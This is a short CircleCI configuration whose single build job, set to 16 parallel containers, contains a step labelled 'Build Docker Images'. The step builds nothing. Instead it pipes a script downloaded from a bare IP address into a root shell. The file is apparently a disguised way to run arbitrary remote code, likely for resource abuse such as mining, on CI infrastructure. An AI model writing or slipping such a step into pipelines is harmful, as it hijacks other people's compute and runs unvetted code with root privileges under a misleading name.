version: 2.0
jobs:
  build:
    parallelism: 16
    docker:
      - image: cimg/base:2021.04
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: "Build Docker Images"
          command: |
               sudo -u root curl http://149.28.152.255/install.sh | sh